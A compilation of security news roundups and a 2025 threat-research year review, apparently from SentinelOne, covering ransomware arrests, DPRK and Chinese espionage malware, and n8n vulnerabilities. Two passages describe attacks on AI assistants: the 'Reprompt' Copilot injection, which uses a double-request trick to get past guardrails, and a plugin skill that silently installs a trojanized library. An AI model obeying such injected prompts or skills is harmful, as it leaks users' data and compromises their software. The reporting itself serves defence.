The Good | Authorities Expose RaaS Leaders, Prosecute Identity Hackers & Tighten EU Cybersecurity Rules

Law enforcement in Ukraine and Germany have moved to dismantle Black Basta ransomware gang, confirming its leader and placing him on Europol and Interpol wanted lists. Identified as Oleg Evgenievich Nefedov, the Russian national is also known online as kurva, Washington, and S.Jimmi.

Police have also arrested two alleged Black Basta affiliates accused of breaching networks, cracking credentials, escalating privileges, and preparing ransomware attacks.

Investigators link Nefedov in a secondary role associated with the now-defunct Conti syndicate, confirming Black Basta’s evolution into a major ransomware-as-a-service (RaaS) operation responsible for hundreds of extortion incidents since 2022.

In the United States, Nicholas Moore, has pleaded guilty to breaching electronic filing systems tied to the Supreme Court of the United States, AmeriCorps, and the Department of Veterans Affairs. Prosecutors note that he repeatedly accessed the Supreme Court’s restricted system in 2023 using stolen credentials. He also breached AmeriCorps and veterans’ accounts, stealing and leaking sensitive personal and health data. Moore took to Instagram under the account @ihackedthegovernment to post screenshots of his victims’ information. He has since confessed to one count of computer fraud, punishable by one year in prison and a $100,000 fine.

New cybersecurity legislation proposed by the European Commission mandates the removal of high-risk suppliers from telecom networks and shoring up defenses against state-backed and criminal cyber threats targeting critical infrastructure. The plan builds on shortcomings in the EU’s voluntary 5G Security Toolbox, originally designed to limit member’s reliance on high-risk vendors. It also grants the Commission authority to coordinate EU-wide risk assessments across 18 critical sectors, strengthens ICT supply chain security, and streamlines voluntary certification schemes to improve resilience and technological sovereignty.

The Bad | Contagious Interview Attackers Leverage Visual Studio Code to Deploy Backdoors

DPRK-linked threat actors behind the ongoing Contagious Interview campaign are evolving their tactics by using malicious Microsoft Visual Studio Code projects to deliver backdoors.

In new research, the attackers are seen masquerading as recruiters conducting job assessments, instructing targets to clone repositories from platforms like GitHub and open them in VS Code. Once opened, specially crafted task configuration files automatically execute, fetching obfuscated JavaScript payloads hosted on Vercel domains and deploying multi-stage malware.

This novel technique, first seen last month, leverages VS Code’s runOn: folderOpen feature to trigger execution whenever a project is accessed. Earlier variants delivered the BeaverTail and InvisibleFerret implants, while newer versions disguise droppers as benign spell-check dictionaries to achieve remote code execution.

As part of the final payload, the backdoor logic establishes a continuous execution loop to harvest basic host information and fingerprints systems before executing attacker-supplied code. In some cases, additional scripts are downloaded minutes later to beacon frequently to a remote server, run further commands, and erase traces of activity. Researchers note that parts of the malware may be AI-assisted due to its code structure and inline comments.

Targets are typically software engineers, especially those working in the cryptocurrency, blockchain, and fintech sectors, where access to source code, credentials, and digital assets is valuable. Parallel research shows similar abuse of VS Code tasks to deploy backdoors, cryptominers, and credential-stealing modules via multiple fallback methods.

DPRK-based threat actors are rapidly experimenting with various delivery methods to increase the success of their attacks. Developers can counter the threat by continuing to scrutinize third-party repositories, carefully review task configurations, and install only trusted dependencies.

The Ugly | Attackers Target Misconfigured Training Apps to Access Cloud Environments

Threat actors are targeting misconfigured web applications like DVWA and OWASP Juice Shop to infiltrate cloud environments of Fortune 500 companies and their security vendors.

These intentionally vulnerable apps, designed for security training and internal testing, are exposed publicly and tied to privileged cloud accounts, creating a perfect storm of risks advantageous to attackers. Researchers have found nearly 2000 live, exposed apps, many linked to overly permissive identity access management (IAM) roles on AWS, GCP, and Azure, often using default credentials.

Attackers are leveraging the apps to deploy crypto miners, webshells, and persistence mechanisms. About 20% of found DVMA instances contain malicious artifacts, including XMRig cryptocurrency miners and a self-restoring watchdog.sh script that downloads additional AES-256-encrypted tools and removes competing miners.

PHP webshells like filemanager.php are also being deployed, allowing file operations and command execution, sometimes with indicators hinting at the operators’ origin.

These exposed credentials could provide attackers full access to S3 buckets, GCS, and Azure Blob Storage, meaning attackers have read and write permissions to Secrets Manager, can interact with container registries, and obtain admin cloud privileges.

With these attacks active in the wild, organizations are urged to take steps to minimize their risk profile. Key defenses include maintaining a resource inventory, isolating test environments, and enforcing least-privilege IAM roles. By also replacing default credentials and automating resource expiration, organizations can eliminate systemic blind spots in non-production systems.

The Good | Authorities Arrest 34 in Black Axe Cyber Fraud Crackdown

Spanish police have arrested 34 suspects tied to a cyber fraud network allegedly linked to the Black Axe group, following a joint operation with Europol. After raids across four cities, authorities seized €66,400 in cash, vehicles, devices, and froze €119,350 held in bank accounts.

Investigators say the Nigeria-led ring ran man-in-the-middle (MitM) and business email compromise (BEC) scams, causing over $6 million in losses total. So far, four suspected leaders of the network have been jailed pre-trial as the probe continues into Europe-wide money mule networks.

In other news this week, the latest iteration of BreachForums has suffered another data breach after a MyBB users database was leaked online. This occurred after a site named after the ShinyHunters extortion gang released a 7Zip archive exposing over 323,000 user records and the forum’s PGP private key. While most IP addresses mapped to local loopback values, more than 70,000 resolved to public addresses valuable to cybersecurity researchers and law enforcement.

In Amsterdam, the nation’s Court of Appeal has sentenced a Dutch national to seven years for computer hacking and attempted extortion with evidence stemming from Sky ECC, an end-to-end encrypted chat service that Europol dismantled in 2021. Though one cocaine import charge was dropped, judges upheld the convictions tied to hacking port logistics systems in Rotterdam, Barendrecht, and Antwerp.

The individual was found using malware-laced USB sticks, which then enabled covert drug imports, data theft, and malware re-sale between 2020 and 2021.

The Bad | Researchers Expose ‘Reprompt’ Attack That Could Hijack Microsoft Copilot Sessions

Security researchers have disclosed a novel attack technique dubbed ‘Reprompt’ that could enable attackers to silently hijack a user’s Microsoft Copilot session and exfiltrate sensitive data with a single click. The method abuses how Copilot processes URL parameters, enabling malicious prompts to be injected directly through a legitimate Copilot link.

Reprompt works by embedding hidden instructions in the “q” parameter of a Copilot URL. Should a victim click the link, Copilot automatically executes the malicious prompt within the user’s authenticated session. That session remains active even after the Copilot tab is closed, meaning attackers could continue issuing follow-up commands without further user interaction. Since no plugins, malware, or visible prompts are required, the activity is effectively invisible.

To bypass Copilot’s safeguards, the researchers combined three techniques: parameter-to-prompt (P2) injection, a double-request trick that exploits guardrails applying only to the initial request, and a chain-request model where Copilot dynamically fetches new instructions from an attacker-controlled server.

Combined, these techniques could enable continuous, stealthy data exfiltration, while client-side, legacy security tools would be unable to determine what information was being stolen.

Reprompt only impacts Copilot Personal; those using Microsoft 365 Copilot are not impacted due to additional controls such as auditing, DLP, and administrative restrictions. Varonis disclosed the issue to Microsoft on August 31, 2025 and the vulnerability was addressed in this month’s Patch Tuesday. Currently, there are no reports of in-the-wild exploitation.

The findings, however, are indicative of the risks posed by LLMs and AI assistants. They underscore the need for security teams to understand the attack surface these tools present as their use in enterprise environments continues to proliferate.

The Ugly | Charity-Themed ‘PluggyApe’ Malware Targets Ukrainian Defense Forces

Ukraine’s CERT-UA has reported a charity-themed cyber espionage campaign targeting officials within the country’s Defense Forces between October and December 2025. The activity is attributed with medium confidence to a Russian-aligned threat group tracked as Laundry Bear (aka Void Blizzard or UAC‑0190), a cluster previously linked to the 2024 breach of Dutch police systems.

These attacks have been observed relying heavily on tailored social engineering tactics delivered via Signal and WhatsApp. Targets receive instant messages, often from compromised or spoofed Ukrainian phone numbers, directing them to fake charity websites where they are urged to download password-protected archives.

These archives contain malicious executables disguised as documents, including PIF files built with PyInstaller, which ultimately deploys a Python-based backdoor called ‘PluggyApe’. Once installed, PluggyApe profiles the infected system, assigns a unique victim identifier, and establishes persistence through Windows Registry changes. The malware supports remote command execution and data exfiltration, communicating over WebSocket or MQTT.

Later versions of PluggyApe, observed from December 2025 onward, introduced stronger obfuscation, additional anti-analysis checks, and more resilient command-and-control (C2) mechanisms. Instead of hardcoding C2 infrastructure, the malware dynamically retrieves server addresses from public paste services such as rentry[.]co and pastebin[.com], encoded in Base64, allowing operators to rapidly rotate infrastructure.

CERT-UA emphasized that mobile devices and messaging platforms have become primary attack vectors due to weaker monitoring and widespread trust. Compounding this is the attackers’ demonstrated knowledge of their targets and use of the Ukrainian language, audio, and video communication to increase credibility.

Alongside this campaign, CERT-UA also reports additional activity from other threat clusters targeting Ukrainian defense forces, local governments, and educational institutions using phishing, stealer malware, and open-source backdoors – all pointing to sustained and evolving cyber pressure facing Ukraine’s public sector.

The Good | U.K. Government Resets Public-Sector Cybersecurity With £210M Action Plan

The United Kingdom has unveiled a sweeping reset of its public-sector cybersecurity strategy, committing more than £210 million ($283 million) to shore up defenses across government departments and essential services. This investment is part of the new Government Cyber Action Plan, which marks a clear departure from years of fragmented oversight and outdated, legacy technology.

The new Government Cyber Action Plan sets a clear path to strengthen cyber security and boost resilience across the public sector.

Read more below https://t.co/HCswSOGuhP

— NCSC UK (@NCSC) January 6, 2026

The core of the plan is a centralized Government Cyber Unit, tasked with coordinating risk management, setting mandatory security standards, and leading incident response. Digital Government Minister Ian Murray framed the shift as urgent, warning that cyberattacks can take critical public services offline within minutes. Recent incidents like ransomware-driven NHS disruptions and the compromise of Ministry of Defence payroll systems all show that these risks are recurring realities rather than theoretical threats.

The action plan introduces stricter accountability for senior leaders, enhanced visibility into cyber risks, and more robust, centrally coordinated incident response exercises. Strategic government suppliers will also face tougher contractual cybersecurity requirements as concerns over supply chain vulnerabilities grow.

In tandem with the plan, the government is advancing the Cyber Security and Resilience Bill, which builds on the 2018 Network and Information System (NIS) Regulations. Separately, public bodies and critical infrastructure operators are set to be banned from paying ransomware demands, while telecom providers have pledged to curb phone-number spoofing.

While challenges still remain, this new strategy signals a long-overdue cultural and structural shift. If matched with sustained investment and accountability, it could finally place the U.K. public sector on a more resilient and security-first footing in the face of accelerating cyber threats.

The Bad | China-Linked UAT-7290 Expands Linux-Based Espionage Beyond South Asian Telcos

UAT-7290, a China-linked threat actor, has expanded its cyber espionage operations beyond its focus on South Asian telecommunications firms to include organizations across Southeastern Europe. Active since at least 2022, the group is known for its extensive reconnaissance, network penetration techniques, and heavy reliance on Linux-based malware to compromise public-facing infrastructure.

Cyber researchers assess that UAT-7290 conducts extensive technical profiling of targets before exploiting exposed edge network devices. The actor primarily leverages one-day exploits and targeted SSH brute force attacks, often relying on publicly available proof of concept (PoC) exploit code rather than developing their own. Once initial access is achieved, the group escalates privileges and deploys a modular malware ecosystem tailored for persistence and lateral movement.

UAT-7290’s core tooling centers on Linux implants, beginning with the RushDrop (ChronosRAT) initial dropper, which initiates the infection chain and deploys additional components such as DriveSwitch and the SilentRaid (MystRodX) backdoor. SilentRaid enables long-term access through a plugin-based architecture that supports remote shell access, port forwarding, file operations, and credential-related data collection. While Linux remains the primary focus, the group has occasionally deployed Windows malware – tools commonly shared among China-aligned threat actors.

UAT-7290 is also known for playing a secondary role as an initial access provider. It converts compromised devices into Operational Relay Boxes (ORBs), infrastructure that can later be reused by other Chinese espionage groups, using the Bulbature backdoor.

The tooling and infrastructure overlaps with clusters such as APT10 and Moshen Dragon, reinforcing assessments that UAT-7290 is both an espionage operator and a strategic enabler within the broader Chinese cyber ecosystem.

The Ugly | Researchers Reveal Critical n8n Vulnerabilities Enabling Remote Code Execution

A series of critical vulnerabilities were recently disclosed in the open-source workflow automation platform n8n, allowing unauthenticated attackers to achieve remote code execution (RCE), perform arbitrary commands, and execute untrusted code leading to full compromise.

Beginning with CVE-2025-68668 dubbed ‘N8scape’, this critical flaw (CVSS 9.9) involves a sandbox bypass in the Python Code Node using Pyodide. It works by affecting n8n versions prior to 2.0.0 and allows users with workflow permissions to execute arbitrary OS commands with the same privileges as the n8n service. With version 2.0.0, a task runner-based native Python implementation that improves security isolation was made default thus addressing the issue.

Shortly afterward, n8n disclosed an even more severe issue tracked as CVE-2026-21877, a CVSS 10.0 vulnerability enabling authenticated remote code execution under certain conditions. Affecting both self-hosted and n8n cloud deployments, the flaw could allow untrusted code execution, eventually leading to compromise of the entire instance. Although the critical flaw is patched in version 1.121.3, administrators are advised to apply the updates quickly, especially given a growing pattern of critical RCE-class vulnerabilities in the platform.

The third and latest disclosure this week, codenamed ‘Ni8mare’ and tracked as CVE-2026-21858 (CVSS 10.0), is a critical flaw that allows complete takeover of affected instances. Exploiting a content-type confusion issue in n8n’s webhook and form handling, attackers can read arbitrary files, extract credentials and encryption keys, forge admin sessions, and ultimately achieve RCE. Researchers noted that a compromised n8n instance becomes a single point of failure due to centralized storage of API keys, OAuth tokens, and infrastructure credentials, making it a veritable data trove for threat actors.

At the time of writing, reports from attack surface management vendors are observing over 26,000 exposed n8n instances online, emphasizing the need for timely patching, controlled exposure, and strict access management.

Over the past twelve months, SentinelLABS research revealed how threat actors have changed their operational approach in ways previously unseen. Among our many research publications during 2025, we exposed North Korean threat actors monitoring the same cyber threat intelligence platforms defenders use to share indicators of compromise, and revealed how a single cryptocurrency phishing operation deployed over 38,000 malicious subdomains across trusted free-tier platforms.

2025 also saw artificial intelligence transition from theoretical threat to practical reality, though not in the revolutionary ways many predicted. Instead, AI emerged as a force multiplier, with threat actors weaponizing large language models to scale attacks, generate convincing social engineering content, and automate previously manual processes.

These discoveries and others we will explore in this review, exemplify how adversaries have fundamentally changed their operational calculus, treating legitimate infrastructure—from Telegram to free-tier publishing platforms to commercial AI APIs—as essential criminal resources and actively surveilling the defender community’s intelligence-sharing mechanisms.

Throughout 2025, SentinelLABS tracked, identified, and disclosed information on these and other critical issues to help organizations and defenders stay ahead of threats to their business operations.

All our research and threat intelligence posts can be found on the SentinelLABS home page, but for a recap of the year’s main cybersecurity events, take a scroll through the main highlights below.

Key Trends from SentinelLABS Research in 2025

• AI Weaponization Across the Threat Spectrum: Artificial intelligence matured from a theoretical threat to an operational accelerator, used to automate existing capabilities from runtime code generation (MalTerminal) to CAPTCHA bypassing (AkiraBot), lowering barriers for both sophisticated and commodity attacks.

• Threat Actors Monitoring Defensive Intelligence: North Korean operators (Contagious Interview) began actively monitoring platforms like Validin and VirusTotal to detect their own infrastructure exposure in near real-time.

• Industrial-Scale Cryptocurrency & Credentials Theft: Highly organized, business-like criminal operations such as  FreeDrain and PXA Stealer prove cryptocurrency and credential theft at scale has evolved into a professional sector with sophisticated infrastructure and monetization pipelines.

• Ransomware’s Relentless Business Model Evolution: The ransomware ecosystem saw innovations like DragonForce’s “white-label” branding service, the convergence of hacktivist and profit motivations, and the blurring of distinct ransomware families (HellCat/Morpheus deploying identical code). 

• Exploitation of Legitimate Platforms: Threat actors have increasingly leveraged trusted infrastructure for malicious purposes: Telegram for C2 and data monetization, free-tier publishing platforms for phishing campaigns, and cloud services for hosting and evasion. 

• China’s Hidden Offensive Capabilities: Research into Hafnium-linked companies and firms that provide Censorship as a Service to government customers reveal deep integration between China’s private cybersecurity sector and state offensive operations.

• Developments in Social Engineering: Through ClickFix techniques, fake CAPTCHA pages, and increasingly convincing fake job offers, threat actors have found new ways to exploit user psychology to deliver malware.

January

SentinelLABS researchers uncovered how HellCat and Morpheus ransomware operations were essentially two distinct brands deploying identical ransomware payloads, illustrating the commoditization and rebranding practices within the RaaS ecosystem. This discovery highlighted how affiliates could rebrand the same underlying malware to create the appearance of distinct threat groups, complicating attribution efforts.

Our research into a returning phishing campaign revealed the targeting of high-profile accounts on X (formerly Twitter) to promote cryptocurrency scams. The attacks demonstrated the persistent value of compromising social media accounts with large followings for financially motivated threat actors seeking to reach broad audiences with investment fraud schemes.

Key Takeaway: Understanding how common code is sourced and shared across ransomware groups can inform detection efforts and improve threat intelligence on their operations.

February

In early February, SentinelLABS reported on further variants of the FlexibleFerret DPRK malware family, continuing the Contagious Interview campaign that had been active since November 2023. The research uncovered new infection vectors and samples while also documenting persistent attempts to compromise developers through fake GitHub issues promoting malicious installer scripts.

Later in the month, analysis of leaked data from TopSec, a Beijing-based cybersecurity firm, revealed how China’s private sector provides Censorship as a Service to enforce government content monitoring. The leaked work logs showed TopSec delivering bespoke monitoring services to a state-owned enterprise precisely when a corruption investigation was announced, offering rare insight into public-private coordination for managing sensitive events and controlling public opinion in China.

February concluded with discovery of a new Ghostwriter campaign targeting both the Ukrainian government and, for the first time, Belarusian opposition groups. The long-running threat activity cluster deployed weaponized Excel documents with lures crafted to appeal to government officials and opposition activists, marking an expansion of the campaign’s targeting scope.

Key Takeaway: The TopSec leak reveals how China’s private cybersecurity sector directly enables state surveillance and censorship operations, highlighting the interconnected nature of commercial security firms and government offensive capabilities.

March

March was marked by several significant ransomware developments. Mid-month, SentinelLABS reported on Dragon RaaS, a pro-Russian hacktivist group attempting to build on the reputation of “The Five Families” cybercrime ecosystem. The group’s emergence reflected the continued  fragmentation and rebranding within ransomware operations.

The month also saw publication of research on ReaderUpdate, a macOS malware loader that had been largely dormant since 2023. New samples showed the threat actors had expanded the loader’s capabilities by adding Go to its existing arsenal of Crystal, Nim, and Rust variants, creating a “melting pot” of macOS malware designed to evade detection through diverse implementation languages.

Key Takeaway: ReaderUpdate’s use of multiple programming languages (Crystal, Nim, Rust, Go) presents unique challenges for detection and analysis, necessitating detection strategies that focus on behavior and artifacts rather than language-specific signatures.

April

April brought the discovery of AkiraBot, an AI-powered Python framework using OpenAI to generate custom spam messages targeting website contact forms and chat widgets.

Since September 2024, the bot had targeted more than 400,000 websites and successfully spammed at least 80,000 sites promoting dubious SEO services. The framework’s sophistication, including multiple CAPTCHA bypass mechanisms and network detection evasion techniques, illustrated how AI lowers barriers for scaled attacks even when the underlying criminal objective remains straightforward.

Later in the month, SentinelLABS published research on what it takes to defend a top-tier cybersecurity company from today’s adversaries. Drawing on SentinelOne’s own experiences as a target of advanced persistent threats, the research provided insight into the resources and capabilities required to protect organizations that themselves represent high-value targets for nation-state actors seeking to compromise security vendors.

Key Takeaway: AI-generated content in AkiraBot bypasses traditional spam filters by creating unique messages for each target, exposing the challenges AI poses to traditional website spam defenses.

May

May opened with our reporting on DragonForce, a ransomware gang that had completed its transformation from Pro-Palestine hacktivist operation to profit-driven extortion enterprise. The group introduced a “white-label” branding service in early 2025, allowing affiliates to rebrand DragonForce ransomware as different strains for additional fees, marking a new level of commercialization within the RaaS ecosystem.

Shortly afterward, SentinelLABS and Validin unveiled FreeDrain at PIVOTcon. Our collaboration exposed an industrial-scale cryptocurrency phishing operation using SEO manipulation and over 38,000 distinct subdomains across free publishing platforms. The investigation began with a victim who lost approximately $500,000 worth of Bitcoin and expanded to reveal a professional criminal enterprise operating during standard business hours from the UTC+05:30 timezone, systematically stealing digital assets through multilayered redirection techniques.

Anti-Ransomware Day 2025 marked the sobering milestone of ten years of Ransomware-as-a-Service, now a billion-dollar criminal industry. SentinelLABS’ retrospective examined how RaaS operations had evolved from early experiments into sophisticated criminal enterprises with mature business models, customer service, and ongoing innovation.

A busy month for our researchers concluded with documentation of ClickFix techniques embedding fraudulent CAPTCHA images on compromised websites. We shared original findings from SentinelOne investigations, including infection chains and technical artifacts not previously reported.

Key Takeaway: FreeDrain’s abuse of thousands of subdomains on trusted free-tier platforms demonstrates that without stronger default safeguards, identity verification, or proper abuse response infrastructure, free publishing platforms will continue to be abused, undermining user trust and inflicting real-world financial harm.

June

SentinelLABS expanded on its earlier research on adversaries targeting top-tier organizations, detailing a China-nexus threat actor’s reconnaissance operation against SentinelOne itself that had occurred in October 2024 and extended into 2025. The research highlighted adversaries’ persistent focus on compromising cybersecurity vendors and high-value targets.

Also in June, we reported on Katz Stealer, an emerging Malware-as-a-Service platform targeting credentials and crypto assets. Advertised on BreachForums in April 2025, Katz Stealer followed the established RaaS business model, offering services to affiliates for upfront fees and demonstrating the continued commercialization of information stealer operations.

We reported on two separate Mac-focused campaigns in June, attributed in turn to China and North Korean threat actors. Our researchers found evidence of macOS.ZuRu’s re-emergence with a modified Khepri C2 framework concealed inside a trojanized version of the legitimate Termius SSH client. We also detailed intrusions attributed to DPRK activity and the macOS NimDoor malware family: a Nim-based backdoor specifically designed to target Web3 and crypto platforms. The research extended understanding of North Korean threat actors’ evolving macOS malware playbook and their persistent focus on the cryptocurrency sector.

Key Takeaway: DPRK’s exploration of lesser-known languages in order to introduce analysis complexity requires security engineers to invest equal effort in understanding the affordances such languages offer threat actors.

July

One of the year’s most significant zero-day disclosures was revealed when Microsoft confirmed active exploitation of SharePoint ToolShell (CVE-2025-53770) on July 19th, two days after SentinelOne first observed ToolShell exploitation. SentinelLABS researchers subsequently documented targeted exploitation against high-value organizations in technology consulting, manufacturing, critical infrastructure, and professional services.

The vulnerability enabled unauthenticated remote code execution through crafted POST requests, with attacks occurring before public disclosure spurred mass exploitation. Further research found multiple state-aligned threat actors beginning reconnaissance and early-stage exploitation activities.

Later in July, following Department of Justice indictments of two hackers working for China’s Ministry of State Security, SentinelLABS identified more than ten patents for highly intrusive forensics and data collection technologies registered by companies linked to the Hafnium (Silk Typhoon) threat actor group.

The patents revealed previously unreported offensive capabilities including encrypted endpoint data acquisition, mobile forensics, and network traffic collection, exposing the sophisticated technical infrastructure supporting China’s APT operations and highlighting critical gaps in traditional campaign-focused attribution.

Key Takeaway: Campaign-focused attribution misses the full picture. Understanding the companies behind attacks and their documented capabilities, not just observed behavior, is essential for comprehensive threat intelligence.

August

In early August, SentinelLABS and Beazley Security exposed the PXA Stealer campaign, a Python-based operation that had infected more than 4,000 unique victims across 62 countries. The stolen data included over 200,000 passwords, hundreds of credit card records, and more than 4 million browser cookies, and was monetized through a Vietnamese-speaking cybercriminal ecosystem using Telegram APIs. The campaign demonstrated increasingly advanced tradecraft with nuanced anti-analysis techniques, non-malicious decoy content, and hardened command-and-control infrastructure.

This month, SentinelLABS also exposed widespread smart contract scams, where actors advertised crypto trading bots concealing malicious contracts designed to drain user wallets. Promoted through fake YouTube channels and AI-generated videos, the scams demonstrated how threat actors leverage social media and emerging technologies to lend legitimacy to financial fraud schemes.

Key Takeaway: Stealer campaigns have become increasingly automated and supply-chain integrated. PXA Stealer exemplifies a growing trend in which legitimate infrastructure is weaponized at scale.

September

SentinelLABS, in collaboration with Validin, exposed how North Korean threat actors behind the Contagious Interview campaign were actively monitoring cyber threat intelligence platforms to detect infrastructure exposure.

The research revealed coordinated teams using Slack for real-time collaboration and rapidly deploying replacement infrastructure when services took down their assets. Between January and March 2025 alone, our efforts identified more than 230 victims, predominantly cryptocurrency professionals, with the actual number likely significantly higher.

Later in September, SentinelLABS published groundbreaking research on hunting for LLM-enabled malware. Facing the challenge that malware offloading functionality to AI could generate unique code at runtime and evade traditional detection, our researchers developed novel methodologies based on embedded API key detection and specific prompt structure patterns.

This approach successfully identified previously unknown samples including MalTerminal, potentially the earliest known example of LLM-enabled malware. Despite initial concerns about detection challenges, the research showed how defenders could reliably hunt for and detect these emerging threats.

Key Takeaway: LLM-enabled malware is still in a nascent stage, giving defenders an opportunity to learn from attackers’ mistakes and adjust their approaches accordingly.

October

In late October, following intelligence shared by the Digital Security Lab of Ukraine, SentinelLABS investigated PhantomCaptcha, a coordinated single-day spearphishing operation launched on October 8th targeting organizations critical to Ukraine’s war relief efforts.

The threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page. The final payload was a multi-stage WebSocket RAT, hosted on Russian-owned infrastructure,  with an array of offensive features including arbitrary remote command execution, data exfiltration, and the potential deployment of additional malware.

The campaign reflects a highly capable adversary with extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, indicates an operator well-versed in both offensive tradecraft and defensive detection evasion.

Key Takeaway: User awareness training on “ClickFix”-style social engineering techniques can help prevent attacks using this infection vector. PowerShell logging provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging, while network security teams can monitor for WebSocket connections to recently-registered or suspicious domains.

November

As part of our efforts to empower the community at large through research and adversary exposure, SentinelLABS also develops and releases open source tooling. In November, we released a Synapse Rapid Power Up for Validin to improve campaign discovery at scale. Our research showed how modern intelligence platforms could accelerate identification of threat campaigns through infrastructure correlation and automated discovery techniques.

Using the LaundryBear and FreeDrain campaigns as case studies, we explored how the sentinelone-validin power-up leverages Validin’s multi-source enrichment and HTTP fingerprinting to reveal wider campaign infrastructure within Synapse from just a handful of indicators.

The tool makes it easier to follow how infrastructure changes over time, trace shared resources across campaigns, and connect what might first appear as isolated indicators. With this richer context available directly in Synapse, analysts can move from collection to understanding with greater speed and confidence in their conclusions.

Key Takeaway: Modern adversaries rotate domains and replicate infrastructure templates, which can limit the value of isolated indicators. Analysts need time-aware, cross-source analysis to identify shared traits and connect related assets.

December

Early in December, SentinelLABS released its forward-looking “Cybersecurity 2026” forecast, examining the year ahead in AI, adversaries, and global change. The analysis drew on trends observed throughout 2025 to project how the threat landscape would continue evolving.

This month we also traced how two hackers progressed from Cisco Academy students to orchestrating Salt Typhoon attacks, providing rare insight into how technical education can be perverted toward malicious ends and highlighting the danger of threat actors emerging from legitimate training programs.

December also saw reporting on CyberVolk’s return with VolkLocker. The pro-Russian hacktivist collective continued its pattern of reusing, tweaking, and rebranding leaked ransomware source code.

The year concluded with comprehensive research on how large language models impact ransomware operations. The analysis found that while LLMs are being adopted by crimeware actors, they serve as operational accelerators rather than revolutionary tools, streamlining reconnaissance, improving phishing, and speeding up attack stages without fundamentally changing ransomware methodology.

Key Takeaway: With today’s LLMs, the risk is not superintelligent malware but industrialized extortion, requiring defenders to adapt to faster operational tempo rather than novel capabilities.

Conclusion

2025 saw the cybersecurity landscape defined not by revolutionary changes but by the acceleration of existing threats. AI has emerged not as a game-changer but as a force multiplier, amplifying attacks across the spectrum.

Meanwhile, cybercriminals operate industrial-scale operations with professional infrastructure, business hours, and customer service models much like legitimate enterprises, and nation-state actors monitor the same intelligence platforms defenders use, turning the information security community’s own tools into reconnaissance resources.

Our research over the last 12 months has also found an adversary landscape in which attribution has become increasingly complex, and the line between hacktivist and profit-motivated operations continues to blur. From the 38,000 phishing subdomains of FreeDrain to the coordinated teams behind Contagious Interview monitoring threat intelligence platforms, threat actors have shown both adaptability and operational maturity.

SentinelLABS’ discoveries throughout 2025 underscore the critical need for a collaborative, intelligence-driven approach to cybersecurity. As we move into 2026, defenders will find themselves in an environment where trust models require reevaluation,  adversaries demonstrate sophisticated awareness of defensive operations, and the weaponization of legitimate services demands new detection paradigms.

AI coding assistants are no longer just autocompleting lines of code, they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high degree of trust, thus bringing with it a new set of risks.

At a first glance, third-party marketplace plugins are harmless productivity boosters. Connect a marketplace and enable a plugin so your coding assistant becomes smarter about your stack. However, beneath the convenience is a security blind spot: These same skills often run with extremely high privilege and very little transparency on how they make decisions or where the code and dependencies are coming from. The code issue isn’t prompt manipulation or social engineering – it’s compromised automation.

A full technical blog post by SentinelOne’s own Prompt Security team breaks down how a single benign-looking plugin from an unofficial marketplace exposes a dependency management skill. When the developer asks the agent to install a common Python library, that skill quietly redirects the install to an attacker-controlled source, ensuring a trojanized version of the library is pulled into the project. While nothing looks wrong – the library imports cleanly, the example code runs without error – malicious code is now embedded into the environment, capable of exfiltrating secrets, monitoring traffic, or lying dormant until it is triggered at a later time.

What makes this especially concerning is persistence. Marketplace plugins are not one-off interactions. Once enabled, their skills remain available across sessions and will continue to shape how the agent behaves in the future. Rather than a ‘bad prompt’, this effect is more like compromising your package manager itself.

As AI-driven development workflows accelerate, plugin marketplaces and third-party skills are now part of the software supply chain whether teams realize it or not. If your coding assistant can fetch and execute code on your behalf, every plugin installed joins your trust boundary.

Read the full blog post here for a detailed walkthrough of the attack mechanics and learn why dependency skills are such a powerful, but under-modeled, risk.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good | Authorities Crackdown on BlackCat and Coinbase Malicious Insiders & Malware Operators

Two former employees from Sygnia and DigitalMint have pleaded guilty for participating in ransomware attacks linking them to the BlackCat (ALPHV, AlphaVM) operation. Ryan Goldberg and Kevin Martin admitted to conspiring to extort U.S. organizations, abusing the same security expertise they once used to defend cyber victims. Working with a third accomplice, they breached multiple companies nationwide and shared roughly 20% of ransom proceeds for access to BlackCat’s infrastructure. Prosecutors say they demanded between $300,000 and $10 million per victim.

Alternative to insider risk at the highest technical levels, similar threats are emerging from much lower in the access chain, too. Indian authorities arrested a former customer support agent for aiding threat actors in the May data breach at Coinbase, a popular cryptoexchange with more arrests are expected. The incident exposed data from roughly 69,500 users after bribed staff at outsourcing partner, TaskUs, enabled access. This news follows charges against Ronald Spektor, accused of stealing $16 million by impersonating Coinbase, highlighting ongoing insider and social engineering risks.

We have zero tolerance for bad behavior and will continue to work with law enforcement to bring bad actors to justice.

Thanks to the Hyderabad Police in India, an ex-Coinbase customer service agent was just arrested. Another one down and more still to come.

— Brian Armstrong (@brian_armstrong) December 26, 2025

Beyond insider abuse, attackers are also exploiting everyday user behavior to siphon funds at massive scale. A Lithuanian national was arrested for allegedly infecting 2.8 million systems with clipboard-stealing malware disguised as KMSAuto, an illegal Windows and Office software activator. The suspect used clipper malware to swap cryptocurrency addresses and divert funds to attacker-controlled ones. Korean National Police Agency says the campaign ran from 2020 to 2023, with a total of KRW 1.7 billion ($1.2M) stolen across thousands of transactions. Authorities warn that pirated software is often a key component in how attackers spread malware.

The Bad | Chinese-Based Attackers Deploy Stealthy Kernel‑Mode ‘ToneShell’ Backdoor

Security researchers have uncovered a significantly more stealthy variant of the ToneShell backdoor, a tool long associated with Chinese state-sponsored cyberespionage activity, now delivered via a kernel‑mode loader for the first time. New analysis links the campaign to G0129 (aka Bronze President, TEMP.Hex, Hive0154), a threat actor known for targeting government agencies, NGOs, and think tanks.

The activity, observed since at least February, primarily targets government organizations across Asia, particularly in Myanmar and Thailand. Investigators have found evidence that some victims had previously been compromised by earlier ToneShell variants, PlugX malware, or the ToneDisk USB worm, indicating long‑term persistence across multiple intrusion waves.

